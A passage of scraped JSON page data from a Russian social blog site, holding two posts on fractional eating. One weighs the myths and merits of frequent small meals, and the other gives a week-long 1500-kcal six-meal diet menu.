образованию газов в кишечнике\x3c/strong>.\x3c/span>\x3c/p>\n\x3cp>\x3cstrong>\x3cspan>Однако, дробное питание может быть полезно в отдельных случаях:\x3c/span>\x3c/strong>\x3c/p>\n\x3cul>\n\x3cli>\n\x3cp>\x3cspan>\x3cstrong>при заболеваниях ЖКТ\x3c/strong> – острых гастритах, колитах, энтероколитах, при обострениях панкреатита, желчекаменной болезни.\x3c/span>\x3c/p>\n\x3c/li>\n\x3cli>\n\x3cp>\x3cspan>\x3cstrong>при интенсивных физических нагрузках для снижения веса\x3c/strong>. Здесь ключевыми являются именно физические нагрузки, а дробное питание (преимущественно низкоуглеводное, высокобелковое) является поставщиком необходимых аминокислот для синтеза мышечного белка.\x3c/span>\x3c/p>\n\x3c/li>\n\x3cli>\n\x3cp>\x3cspan>\x3cstrong>бодибилдерам\x3c/strong>. Такое питание 5-6, а иногда и до 8 раз в день давно и прочно вошло в арсенал подготовки культуристов к соревнованиям. Как известно, инсулин - это анаболический гормон, который усиливает деление клеток и рост тканей. Фактически, он даже больше анаболик, чем гормон роста, правда, весьма «неразборчивый» анаболик, и ему всё равно - накапливать жир или увеличивать мышечную массу. А потому бодибилдеры для наращивания мышц, стремятся к постоянно высокому уровню инсулина в течение всего дня, особенно сразу после тренировки, т.к. в это время мембраны мышечных клеток особенно проницаемы для инсулина и всего того, что он несет с собой (например, глюкозу, ВСАА).\x3c/span>\x3c/p>\n\x3c/li>\n\x3c/ul>\n\x3cp>\x3cspan>Но, \x3cstrong>если нашей целью является только потеря жира, тогда нужно следить чтобы в течение всего дня был низкий уровень инсулина\x3c/strong>. Физиологически говоря, сжечь жир и накачать мышцы одновременно невозможно, потому что один процесс катаболических (потеря жира), а другой анаболический (наращивание мышечной массы).\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Однако, \x3cstrong>если вы едите каждые 2 - 3 часа понемногу, о чём мы говорили выше, ваш уровень инсулина никогда не вернётся к нормальному уровню, и вы никогда не начнёте сжигать жир\x3c/strong>. С другой стороны, даже если вас и не интересует наращивание мышц, всё равно очень важно инициировать хоть какую-то выработку инсулина после силовых тренировок. Это остановит вызванный тренировками катаболизм, а также направит глюкозу и аминокислоты в мышечные клетки. Иначе вы будете терять ценную мышечную ткань, и, следовательно, мешать работе метаболического механизма, который сжигает жир.\x3c/span>\x3c/p>\n\x3cp>\x3cspan>Я очень люблю аюрведу, и хочу привести древнюю индийскую мудрость: йоги (ищут счастье внутри) едят один раз в день, бхоги (обычные люди, которые ищут счастье снаружи) - два раза в день, роги (больные люди – тот, кто не может достичь удовлетворения, и поэтому всё время находится в страдании) - три раза в день. Но, кто ест четыре раза в день, тот дрохи (жадный человек).\x3c/span>\x3c/p>\n\x3cp>\x3cspan>А потому, вывод однозначен: слушайте не диетологов, спортсменов или звёзд, а \x3cstrong>прислушивайтесь исключительно к себе\x3c/strong>. Всё зависит \x3cstrong>только от индивидуальных особенностей организма\x3c/strong>: кто-то утоляет голод при помощи частых перекусов, а кому-то достаточно всего лишь трех приёмов пищи, чтобы чувствовать себя сытым целый день. \x3c/span>\x3c/p>","comments_count":0,"marks_count":37,"likes":{"count":37,"user_likes":0,"can_like":0,"marks_pluses":37,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":37}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30669388060.mirtesen.ru/blog/43114703923","tags":["дробное питание","интересное","мифы","Обсуждение с сообществом","факты","красота","перекусы","здоровье","люди"],"date":1510477266,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20420337150,"photo_original":"https://mtdata.ru/u2/photo5DE6/20420337150-0/original.jpg","width":750,"height":530}}],"group":{"display_name":"ПолонСил.ру - социальная сеть здоровья","url":"https://s30669388060.mirtesen.ru","photo_original":"//mtdata.ru/u20/photo2B7E/20125696275-0/original.jpeg","id":30669388060,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1354869995507},"canonical_url":"https://s30669388060.mirtesen.ru/blog/43114703923","topic":"health","title":"Дробное питание: правда и мифы","preview_text":"Перекусы для большинства из нас стали неотъемлемой частью жизни, а для некоторых - это в принципе ежедневный рацион. И даже реклама «поддерживает»: «Сделай паузу, съешь», «Ты – не ты, когда голоден», «Не тормози». А уж диетологи в один голос твердят: хочешь похудеть и не навредить здоровью – ешь","post_type":"post","formattedDates":{"iso":"2017-11-12T09:01:06.000Z","ver1":"12 ноября, 12:01","ver2":"12.11.2017 в 12:01","ver3":"12 нояб., 12:01"},"images":[{"main":true,"url":"https://mtdata.ru/u2/photo5DE6/20420337150-0/original.jpg","width":750,"height":530}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43135871135,"from_id":610787515,"from":{"id":610787515,"display_name":"Иван Р","url":"https://mirtesen.ru/people/610787515","photo_original":"https://mtdata.ru/u25/photoF58B/20530199656-0/original.jpeg","isAuthenticAccount":false,"sex":2},"owner_id":-30101041796,"text":"\x3cdiv dir=\"ltr\" style=\"text-align: left;\" trbidi=\"on\">\x3ca target=\"_blank\" href=\"https://www.blogger.com/null\" style=\"height: 409px; width: 400px;\">\x3cimg height=\"409\" src=\"http://mtdata.ru/u16/photo16CD/20037182950-0/original.jpg#20037182950\" width=\"400\" />\x3c/a> \x3cbr />С учётом всех требований для правильного и комфортного похудения,а именно:\x3cbr />\x3ca target=\"_blank\">\x3c/a>-он составлен из простых в приготовлении,но очень вкусных блюд;\x3cbr />\x3cbr />-это не диета,здесь нет ограничений,можно есть мясо,рыбу,макароны,крупы и даже сладости,наслаждаясь каждым кусочком;\x3cbr />\x3cbr />-он рассчитан на дробное питание,которое способствует похудению;\x3cbr />\x3cbr />-он отлично вписывается в модель тарелки;\x3cbr />\x3cbr />-меню маложирное и разнообразное, общей калорийностью около 1500 ккал.\x3cbr />\x3cbr />Понедельник\x3cbr />\x3cbr />7–9 ч.Первый завтрак: 30г кукурузных хлопьев,стакан 0,5% молока,фрукт (вы можете съесть яблоко,или грушу,или апельсин,или 2 мандарина,или нектарин,или 5слив,или 10 виноградин).\x3cbr />\x3cbr />11-12ч.Второй завтрак:125 нежирного йогурта или 100г обезжиренного творога,фрукт,чай или кофе (максимум 2 ч.л. сахара).\x3cbr />\x3cbr />14-15ч.Обед:овощной салат,заправленный 2 ч.л. масла,варёная гречка (120г),порция куриных котлет,стакан 0,5% молока или 1% кефира.\x3cbr />\x3cbr />16-17ч.Полдник:помидор,ломтик сыра (30г) до 17% жирности,кусочек зернового хлеба (30г),фрукт,чай или кофе макс.с 2 ч.л. сахара.\x3cbr />\x3cbr />19-21ч.Ужин:пол-тарелки свежих овощей,порция щавелевого супа на простокваше,2 кусочка (по 30г) зернового хлеба,стакан воды.\x3cbr />\x3cbr />Перед сном:помидор,огурец,стакан 0,5% молока или 1% кефира.\x3cbr />\x3cbr />Вторник\x3cbr />\x3cbr />7-9ч.Первый завтрак: порция воздушной ягодной каши,стакан 0,5% молока,фрукт.\x3cbr />\x3cbr />11-12ч.Второй завтрак: 125г нежирного йогурта,ломтик сыра (30г) жирностью до 17%,2 овсяных печенья,кофе или чай (максимум с 2 ч.л. сахара).\x3cbr />\x3cbr />14-15ч.Обед:пол-тарелки свежих овощей,порция морковно-картофельного пюре,порция куриной грудки в остром соусе,кусочек зернового хлеба (30г),стакан 0,5% молока или 1% кефира.\x3cbr />\x3cbr />16-17ч.Полдник:125 нежирного йогурта или 100г обезжиренного творога,фрукт,кофе или чай (максимум с 2 ч.л. сахара).\x3cbr />\x3cbr />19-21ч.Ужин:порция салата табуле,2 кусочка зернового хлеба (по 30г),чай (максимум 2 ч.л. сахара).\x3cbr />\x3cbr />Перед сном:помидор,огурец,100г обезжиренного творога,30г зернового хлеба,чай,максимум 2 ч.л. сахара).\x3cbr />\x3cbr />Среда\x3cbr />\x3cbr />7-9ч.Первый завтрак: порция оладьев с ягодами и взбитыми сливками,кофе или чай (максимум 2 ч.л. сахара)\x3cbr />\x3cbr />11-12ч.Второй завтрак:125г нежирного йогурта или 100г обезжиренного творога,фрукт,чай или кофе.\x3cbr />\x3cbr />14-15ч.Обед: пол-тарелки свежих овощей,2 варёные картофелены среднего размера,порция сочных куриных тефтелек с укропной подливой.\x3cbr />\x3cbr />16-17ч.Полдник: 30г зернового хлеба с 30г нежирной ветчины и кружочками паприки и помидора,фрукт,чай или кофе.\x3cbr />\x3cbr />19-21ч.Ужин: 60г зернового хлеба, с 2 ломтиками сыра до 17% жирности,листьями салата,кружочками паприки и помидора,порция холодного супа из огурцов.\x3cbr />\x3cbr />Перед сном:фрукт,стакан 0,5% молока или 1% кефира.\x3cbr />\x3cbr />Четверг\x3cbr />\x3cbr />7-9ч.Первый завтрак: овсяная каша на 0,5% молоке с горстью ягод,чай или кофе.\x3cbr />\x3cbr />11-12ч.Второй завтрак: 60г зернового хлеба с листьями салата,кусочками паприки и помидора,фрукт,чай или кофе.\x3cbr />\x3cbr />14-15ч.Обед: пол-тарелки свежих овощей,120 варёного риса,порция рыбы,запечённой с сыром,стакан 0,5% молока или 1% кефира.\x3cbr />\x3cbr />16-17ч.Полдник: порция фруктового салата с зернистым творогом,чай или кофе.\x3cbr />\x3cbr />19-21ч.Ужин: порция теплого салата из овощей и крупы,30г зернового хлеба,порция «земляничных взбитых сливок»,чай.\x3cbr />\x3cbr />Перед сном: стакан 0.5% молока или 1% кефира.\x3cbr />\x3cbr />Пятница\x3cbr />\x3cbr />7-9ч.Первый завтрак: варёное яйцо,кусочек зернового хлеба,фрукт,чай или кофе.\x3cbr />\x3cbr />11-12ч.Второй завтрак:125г нежирного йогурта, 30г 17% сыра,2 овсяных печенья,чай или кофе.\x3cbr />\x3cbr />14-15ч.Обед: порция овощной лазаньи,фрукт,стакан воды.\x3cbr />\x3cbr />16-17ч.Полдник: порция малинового парфе,кофе или чай.\x3cbr />\x3cbr />19-21ч.Ужин: овощной салат с 2 ч.л. масла,порция пирога с ветчиной,стакан сангрии,стакан воды.\x3cbr />\x3cbr />Перед сном: фрукт,стакан 0,5% молока или 1% кефира.\x3cbr />Суббота, воскресенье\x3cbr />\x3cbr />7-9ч.Первый завтрак: порция лимонного йогурта,чай или кофе.\x3cbr />\x3cbr />11-12ч.Второй завтрак: 125г нежирного йогурта или 100г обезжиренного творога,фрукт,кофе или чай.\x3cbr />\x3cbr />14-15ч.Обед: пол-тарелки свежих овощей,порция рыбы с тархуном и шпинатом,30г ржаного хлеба,чай или кофе.\x3cbr />\x3cbr />16-17ч.Полдник: стакан клубники со 125г нежирного йогурта.\x3cbr />\x3cbr />19-21ч.Ужин: порция салата «Цезарь»,30г зернового хлеба,чай или кофе.\x3cbr />\x3cbr />Вечерний чай с друзьями: порция лёгких маффинов,порция ягодной пенки,чай (напоминание-чай или кофе всегда с максимум 2 ч.л. сахара!).\x3cbr />\x3cbr />Можете заменять одни блюда другими из рецептов,главное,чтобы не нарушалась калорийность. Успеха!\x3cbr />\x3cdiv>\x3cdiv style=\"height: 409px; width: 400px;\">\x3ca target=\"_blank\" href=\"http://vk.com/zerofat\">источник\x3c/a>\x3c/div>\x3c/div>\x3c/div>","comments_count":6,"marks_count":3,"likes":{"count":1,"user_likes":0,"can_like":0,"marks_pluses":2,"marks_minuses":1,"user_like_attr":null,"like_attr_ids":[{"id":-100,"count":1},{"id":100,"count":2}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://s30101041796.mirtesen.ru/blog/43135871135","tags":["Дробное питание","рецепт"],"date":1438135200,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20037182950,"photo_original":"https://mtdata.ru/u16/photo16CD/20037182950-0/original.jpg","width":400,"height":409}}],"group":{"display_name":"Здоровье в наших руках","url":"https://s30101041796.mirtesen.ru","photo_original":"//mtdata.ru/u24/groupA346/67d5475e3acc17dcaea99ef5334b1604-0/__logo.jpeg","id":30101041796,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1403893363179},"canonical_url":"http://mysportru.blogspot.com/2015/07/1_29.html","topic":"cooking","title":"Дробное питание.Точный рацион на 1 неделю!","preview_text":"С учётом всех требований для правильного и комфортного похудения,а именно: -он составлен из простых в приготовлении,но очень вкусных блюд; -это не диета,здесь нет ограничений,можно есть мясо,рыбу,макароны,крупы и даже сладости,наслаждаясь каждым кусочком; -он рассчитан на дробное питание,которое","post_type":"post","formattedDates":{"iso":"2015-07-29T02:00:00.000Z","ver1":"29 июля, 5:00","ver2":"29.07.2015 в 5:00","ver3":"29 июля, 5:00"},"images":[{"main":true,"url":"https://mtdata.ru/u16/photo16CD/20037182950-0/original.jpg","width":400,"height":409}],"videos":[],"shared_post":null,"mentionedPersons":null}],"tag":"дробное питание","tagId":80049169825,"hasMore":true,"offset":1,"isGeo":false},"reasonsForShowing":{},"channelMain":{"items":[],"nextOffset":0,"hasMoreItems":true,"currentUserPostId":null,"page":0},"richPostEditor":{"id":null,"title":"","text":"","channel":null,"canSelectChannel":false,"canSubmit":false},"indexChannel":{"items":[],"nextOffset":0,"hasMoreItems":true},"videoList":{},"videoOne":{},"videoRecommendations":{},"channelActions":{},"testDraftJs":{},"channelEditor":{"tab":"info","key":0,"isOpen":false,"isReady":true,"inProcess":false,"channelId":null,"isDirty":false,"header":{"title":"","avatar":null},"info":{"id":null,"name":"","title":"","description":"","isNameAvailable":true,"errors":{}},"content":{"tags":[],"tagSuggestions":[],"geoTags":[],"geoTagSuggestions":[]},"telegramEdit":{"importKey":null,"name":"","tags":[],"tagSuggestions":[],"errors":{}},"telegramList":{"imports":[]}},"channelCoverEditor":{"isOpen":false,"mode":"add","imageSaved":false},"channelAvatarEditor":{"isOpen":false},"myChannels":{"channels":[],"subscriptions":{"items":[],"nextOffset":0,"hasMore":true,"subscriptionsNum":0}},"channelHeaderTags":{"isOpen":false,"searchResults":[],"geoTags":[],"tags":[],"searchInProccess":false,"geoPosition":null,"headerTags":[]},"searchResults":{"query":"","activeTab":"posts","isLoading":false,"posts":{"results":[],"page":0,"hasMore":true},"geo":{"results":[],"page":0,"hasMore":true},"channels":{"results":[],"page":0,"hasMore":true}}}